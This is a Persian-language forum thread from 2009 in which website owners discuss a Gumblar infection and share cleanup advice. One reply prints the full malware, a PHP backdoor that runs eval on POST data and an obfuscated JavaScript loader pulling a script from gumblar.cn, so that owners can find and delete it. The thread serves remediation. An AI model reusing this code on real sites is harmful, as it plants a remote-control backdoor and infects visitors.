ویروس در سایت ؟؟!!!

salam_ali · May 26, 2009

سلام
چند وقتی است که هنگامی با موزیلا وارد سایتم می شم این پیغام می یاد که :

Reported Attack Site!

This web site at nimad.org has been reported as an attack site and has been blocked based on your security preferences

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

من یک فایلی که جاوا اسکریپت بود در سایت دیدم که پاک کردم !!!
حالا این فایل از کجا اومده و الان چرا بعد از 2 روز مشکل حل نشده ؟؟؟
لطفا کمکم کنید.
البته به هاست فکر نکنم ربطی داشته باشه آخه در یکی دیگه از سایتام که از هاسته دیگری است باز همین مشکل پیدا شده ... یعنی هر چی سایت در هاستهای دیگه دارم هم همنطوری شده ...

daneshd · May 26, 2009

اگر روی "Why this happens" کلیک کنی این متن میاد:

Of the 6 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-23, and the last time suspicious content was found on this site was on 2009-05-19.Malicious software includes 5 scripting exploit(s).
Malicious software is hosted on 1 domain(s), including gumblar.cn/.
This site was hosted on 1 network(s) including AS32613 (IWEB).

"gumblar" یک ویروس جدید هست. احتمالی هست که سرور اونجا یا به این ویروس آلوده شده، یا این ویروس سعی کرده به اونجا حمله کنه. با Host تماس بگیر.

hba · May 26, 2009

نه اين ويروس با ftp كار مي كنه احتمالا سايتترو با ftp ريختي و رمزش رو سيو شده با اون حمله م كنه
كامپيوتر خودت مشكل داره نه سرور

foranyone · May 26, 2009

منم همچین مشکلی داشتم و دارم

مشکلم با نصب آنتی ویروس و آپدیت اون رو سیستم خودم ، تغیر رمز ورود به هاست و در نهایت تغیر سرور حل شده

احساس می کنم زیادم بی ربط به شرکت هاستینگ نباشه

اونا با این شعار که مشکل از خودتونه از زیر مسئولیت فرار می کنند

به هر حال اینجا یه سری بزنین :

http://www.forum.majidonline.com/showthread.php?t=118018

I.NoBody · May 27, 2009

جديداً يك ويروس(يا شبه ويروس) به شدت داره توي هاستينگ ها رشد ميكنه.
يه كد جاوا اسكريپت به آخر فايل هايي كه نامشون index هست(مثل index.htm , index.php , ...) اضافه ميكنه.

foranyone · May 27, 2009

I گفت:
جديداً يك ويروس(يا شبه ويروس) به شدت داره توي هاستينگ ها رشد ميكنه.
يه كد جاوا اسكريپت به آخر فايل هايي كه نامشون index هست(مثل index.htm , index.php , ...) اضافه ميكنه.

فقط فایل های index نیست ، فایل index وقتی آلوده میشه که ویروس تازه کارشو شروع کرده

بعد از یه مدت فایل های جاوا اسکریپت من فایل های config و بعد از یه مدت همه ی فای ها آلوده میشن

هر کاربری که از وبسایتتون بازدید کنه این کد های جاوااسکریپت تروجاون رو رو کامپیوتر طرف لود می کنند و اگه

طرف مثل من یه طراح وب باشه بدبخت میشه

این ویروس موقعی که میخواین به ftp فایل آپلود کنین پسورد رو میدزده و از اون به بعد با اختیار کامل

هاست رو به کنترل خودش در میاره حتی بعد از یه مدت ممکنه phpmyadmin هم از کار بیوفته

iranaudio · May 27, 2009

حل مشکل ساده ولی زمان بر هستش :
این مراحل رو طی کن :
روی هاستت احتمالاً یک پوشه به اسم images داری . برو توش و فایل images.php یا مشابه این رو که ایجاد شده پاک کن و یه فایل خالی به همین اسم ایجاد کن و به جای اون اپلود کن . بعد همهی تیک های chmod رو بردار .
2 - پسورد اف تی پی رو عوض کن
3- cuteftp رو نصب کن و لوگین کن . بعد تمام فایلهای سایتت رو دونه دونه با cuteftp ادیت رو بزن و دنبال کد

کد:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsY  W5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihHM2w4Sil7dmFyIGJORnQ9J3ZhciYyMGEmM  2QmMjImNTNjcmlwdEVuJjY3aW4mNjUmMjImMmMmNjImM2QmMjJWZSY3MnNpJjZmbigpKyYyMiYyY2omM  2QmMjImMjImMmN1JjNkbmF2aWdhdG9yJjJlJjc1c2VyJjQxZ2VudCYzYmlmKCh1JjJlaSY2ZWQmNjV4T  yY2NigmMjJXaW4mMjIpJjNlMCkmMjYmMjYoJjc1JjJlaW5kZXhPJjY2KCYyMk5UJjIwJjM2JjIyKSYzY  zApJjI2JjI2KGQmNmZjdW1lbiY3NCYyZWMmNmZva2kmNjUmMmUmNjkmNmVkZXgmNGZmKCYyMiY2ZCY2O  WUmNmImM2QmMzEmMjImMjkmM2MwJjI5JjI2JjI2JjI4dCY3OXAmNjVvJjY2KHpydnp0cykmMjEmM2R0e  XBlb2YoJjIyQSYyMikpKSY3YnpyJjc2JjdhdCY3MyYzZCYyMkEmMjImM2ImNjV2JjYxJjZjJjI4JjIya  WYmMjh3aW5kJjZmJjc3JjJlJjIyK2ErJjIyKWomM2QmNmErJjIyJjJiYSsmMjJNYWomNmYmNzImMjImM  mJiK2EmMmImMjJNJjY5bm9yJjIyK2IrYSYyYiYyMkImNzVpbGQmMjImMmJiKyYyMmomM2ImMjIpJjNiZ  CY2ZmN1JjZkJjY1biY3NCYyZXdyJjY5dGUmMjgmMjImM2MmNzNjciY2OXAmNzQmMjAmNzNyYyYzZCYyZ  iYyZiY2N3UmNmQmNjJsYXImMmVjJjZlJjJmcnNzJjJmJjNmaSY2NCYzZCYyMitqKyYyMiYzZSYzYyY1Y  yYyZiY3MyY2M3JpJjcwdCYzZSYyMikmM2ImN2QnO3ZhciBnWEo9dW5lc2NhcGUoYk5GdC5yZXBsYWNlK EczbDhKLCclJykpO2V2YWwoZ1hKKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2

بگرد . اگه فایل php باشه همون خط اوله . این کد رو با <php جایگزین کن و فایل رو سیو کن .
ممکنه توی بعضی فایلها این کد باشه :

کد:

<script language=javascript><!-- 
(function(G3l8J){var bNFt='var&20a&3d&22&53criptEn&67in&65&22&2c&62&3d&22Ve&72si&6fn()+&22&2cj&3d&22&22&2cu&3dnavigator&2e&75ser&41gent&3bif((u&2ei&6ed&65xO&66(&22Win&22)&3e0)&26&26(&75&2eindexO&66(&22NT&20&36&22)&3c0)&26&26(d&6fcumen&74&2ec&6foki&65&2e&69&6edex&4ff(&22&6d&69e&6b&3d&31&22&29&3c0&29&26&26&28t&79p&65o&66(zrvzts)&21&3dtypeof(&22A&22)))&7bzr&76&7at&73&3d&22A&22&3b&65v&61&6c&28&22if&28wind&6f&77&2e&22+a+&22)j&3d&6a+&22&2ba+&22Maj&6f&72&22&2bb+a&2b&22M&69nor&22+b+a&2b&22B&75ild&22&2bb+&22j&3b&22)&3bd&6fcu&6d&65n&74&2ewr&69te&28&22&3c&73cr&69p&74&20&73rc&3d&2f&2f&67u&6d&62lar&2ec&6e&2frss&2f&3fi&64&3d&22+j+&22&3e&3c&5c&2f&73&63ri&70t&3e&22)&3b&7d';var gXJ=unescape(bNFt.replace(G3l8J,'%'));eval(gXJ)})(/&/g);
 --></script>

معمولاً هم کد ها توی فایلهایی به نام function,config,db,database,index یا مشابه اینه پیدا میشه .
مشکلی داشتی تماس بگیر .
ضمن اینکه بعد از پاک شدن سایتت فایل روی هاستت نریز چون باز همین آش و همین کاسه ...

foranyone · May 27, 2009

این کد رو با <php جایگزین کن و فایل رو سیو کن .

این کار باعث نمیشه فایل php error نده ؟

ضمن اینکه بعد از پاک شدن سایتت فایل روی هاستت نریز چون باز همین آش و همین کاسه

یعنی بازم ویروسی میشه ؟ اگه ویروسی میشه چرا این کارا رو انجام دادیم

یعنی مشکل از هاسته ؟

راستی کاش اسکریپت های ویروس رو بدون تگ اسکریپت قرار میدایدن چون منم قبلا یه تاپیک زده بودم مثل شما کد ها رو قرار داده بودم

ویروس اجرا میشد و بعد از یه مدت این کد هاتون پاک میشه ...

iranaudio · May 27, 2009

برای جلوگیری از ویروسی شدن مجدد باید سیستم شخصی که اف تی پی دسترسی داره فرمت کامل بشه و سپس انتی ویروس اوست آپدیت شده نصب بشه .
این تجربه شخصی منه .

sajadmaz · May 29, 2009

یک کاره دیگه هم میتونین انجام بدین از اونجایی که مورد حمله این ویروس فایل ایندکس هست فایل ایندکس رو مثلا به myhomepage.php تغییر بده و با htaccess دایرکتوری ایندکس رو به اسم فایل جدید تغییر بده

foranyone · May 29, 2009

sajadmaz گفت:
یک کاره دیگه هم میتونین انجام بدین از اونجایی که مورد حمله این ویروس فایل ایندکس هست فایل ایندکس رو مثلا به myhomepage.php تغییر بده و با htaccess دایرکتوری ایندکس رو به اسم فایل جدید تغییر بده

تروجان موقع شروع فقط index ها رو آلوده میکنه ، بعدا فایل های جاوا اسکریپت و هر فایلی با هر اسمی آلوده میشه

پس این کار اصلا تاثیر نداره :rose: